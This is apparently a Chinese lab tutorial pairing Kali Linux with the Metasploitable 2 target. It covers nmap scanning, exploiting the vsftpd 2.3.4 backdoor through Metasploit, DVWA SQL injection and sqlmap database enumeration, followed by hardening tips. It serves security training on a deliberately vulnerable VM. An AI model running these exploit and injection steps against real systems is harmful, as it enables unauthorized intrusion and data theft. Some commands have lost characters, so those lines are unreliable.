Kali Linux 2026.2 与 Metasploitable 2 靶场联动:3 步完成首次漏洞扫描与利用

📅2026/7/12 9:04:04 👁️次浏览
Kali Linux 2026.2 与 Metasploitable 2 靶场联动:3 步完成首次漏洞扫描与利用
Kali Linux 2026.2 与 Metasploitable 2 靶场联动实战指南1. 环境准备与网络配置在开始渗透测试之前确保你的Kali Linux 2026.2和Metasploitable 2靶机已正确配置在同一网络环境中。以下是详细步骤虚拟机网络模式选择在VMware或VirtualBox中将两台虚拟机都设置为桥接模式或NAT模式推荐使用NAT模式以避免影响物理网络IP地址确认# 在Kali Linux中执行 ifconfig # 在Metasploitable 2中执行 ifconfig记录下两者的IP地址例如Kali Linux: 192.168.1.100Metasploitable 2: 192.168.1.101网络连通性测试ping 192.168.1.101如果无法ping通检查防火墙设置和虚拟机网络配置。2. 目标发现与信息收集2.1 Nmap基础扫描使用Nmap进行初步扫描发现目标主机开放的服务nmap -sV -T4 192.168.1.101参数说明-sV: 服务版本探测-T4: 加快扫描速度典型输出示例Starting Nmap 7.94 ( https://nmap.org ) at 2026-07-15 10:00 UTC Nmap scan report for 192.168.1.101 Host is up (0.00047s latency). Not shown: 977 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd ...2.2 深度服务识别针对发现的开放端口进行更详细的扫描nmap -A -p 21,22,80 -T4 192.168.1.101这将提供更详细的信息包括操作系统类型服务具体版本可能的漏洞提示3. 漏洞利用实战vsftpd 2.3.4后门Metasploitable 2中著名的vsftpd 2.3.4版本包含一个后门漏洞以下是利用步骤3.1 漏洞验证首先验证目标是否存在此漏洞telnet 192.168.1.101 21 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is ^]. 220 (vsFTPd 2.3.4)确认版本号为2.3.4说明存在漏洞。3.2 Metasploit利用启动Metasploit框架msfconsole搜索并选择漏洞模块search vsftpd 2.3.4 use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.1.101 exploit成功利用后你将获得一个meterpreter会话[*] Command shell session 1 opened (192.168.1.100:4444 - 192.168.1.101:58938)3.3 后渗透操作在获得的shell中执行命令whoami id uname -a4. 进阶渗透Web应用漏洞利用Metasploitable 2还包含多个存在漏洞的Web应用以DVWA为例4.1 访问DVWA在浏览器中访问http://192.168.1.101/dvwa/使用默认凭证登录用户名: admin密码: password4.2 SQL注入攻击导航到SQL Injection测试页面在用户ID输入框中尝试注入1 or 11观察返回结果获取所有用户信息4.3 使用SQLmap自动化测试sqlmap -u http://192.168.1.101/dvwa/vulnerabilities/sqli/?id1SubmitSubmit --cookiesecuritylow; PHPSESSIDabc123 --dbs参数说明-u: 目标URL--cookie: 会话cookie--dbs: 枚举数据库5. 安全加固建议完成渗透测试后应对Metasploitable 2进行以下安全加固服务更新sudo apt-get update sudo apt-get upgrade关闭不必要服务sudo service vsftpd stop sudo update-rc.d vsftpd remove修改默认凭证passwd防火墙配置sudo ufw enable sudo ufw allow 22/tcp sudo ufw deny all6. 学习路径建议对于希望深入网络安全的学习者建议按照以下路径进阶基础技能网络协议分析TCP/IP, HTTP等Linux系统管理脚本编程Bash, Python中级技能常见漏洞原理OWASP Top 10渗透测试方法论取证分析基础高级技能漏洞研究与开发红队战术安全架构设计提示在实际测试中建议使用虚拟机快照功能方便随时恢复到干净状态重复练习。